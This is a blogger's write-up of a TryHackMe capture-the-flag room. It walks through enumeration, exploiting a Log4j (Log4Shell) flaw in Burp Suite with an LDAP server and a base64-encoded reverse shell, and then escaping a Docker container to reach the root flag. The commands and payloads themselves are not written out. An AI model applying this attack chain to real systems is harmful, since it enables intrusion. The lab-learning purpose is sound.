Welcome to the writeup for this medium level room on www.tryhackme.com
First off let’s start the machine up and go make a cup of Java as the room info states this could take around 7 minutes to fully boot up.
Enumeration:
I’m going to start with an nmap scan of the given IP:
As can be seen we have the usual combo of ports 80 & 22 open.
Lets visit the website:
Theres not much here, even checking the view source didn’t reveal anything!
Let’s try a gobuster scan to see what we can dig up!
Awesome we got 2 hits, let’s go and check them out.
One dir just gives us an error page….
The other dir we found indicates we need to dig a little deeper,
So off we go back to gobuster to see if we can dig anything else up.
We get another hit!
Let’s go and check that page out.
Navigating to that page gives us a hint that something here maybe vulnerable, but what could it be?
Investigating the room a little further it seems this web server could be vulnerable to a log4j attack, lets launch burpsuite and investigate a little further.
So with the request captured in Burp I’ll send it to Repeater (CTRL+R) and try a payload in the request to see what happens.
Lets fire up a listener
We got a hit on our listener, so it looks like its definately vulnerable to a log4j attack.
Now let’s try and get a shell and get that first flag in the bag.
After some google fu I eventually found an exploit I could work with, so without further ado lets get to it!
This is the link to the site I visited to get an understanding of how Icould get a shell on the box https://github.com/christophetd/log4shell-vulnerable-app/blob/main/README.md
Lets get everything prepared, first of all im going to start an LDAP server:
Then I’ll setup a listener for my shell:
Now looking at how we exploit this vulnerability it seems that we need to Base64 encode our reverse shell, I use this site to generate my payloads, you can obviously use your preferred method.
Now with my payload prepared let’s go back to Burp and get that shell!!
Boom! We have shell!
Now we need to hunt around for that first flag, the room hint indicates we need to use -a when listing the directories, if you look up what this means in the ls help it gives us this definition. -a, — all do not ignore entries starting with .
After doing some digging around I located the first flag.
Cool with that in the bag lets move on to trying to get root!
After uploading linpeas it confirmed what I already thought that we are in a Docker container.
And have ownership of some interesting SUID files
Now we have this knowledge we can go onto to escape the container and get the root flag!
Looking in a certain directory we can see that we have read/write permissions to certain virtual disks allowing us to escalate our privilege’s and escape the container to grab the final flag.
We are now free of the container!
Just when you think you have the root flag, the room creator decides to play a little joke on us!
So, lets get hunting for the final flag.
After a little poke around we get the final flag and the box is pwned!
This was an awesome box and i thoroughly enjoyed it, many thanks to the creator SilverStr
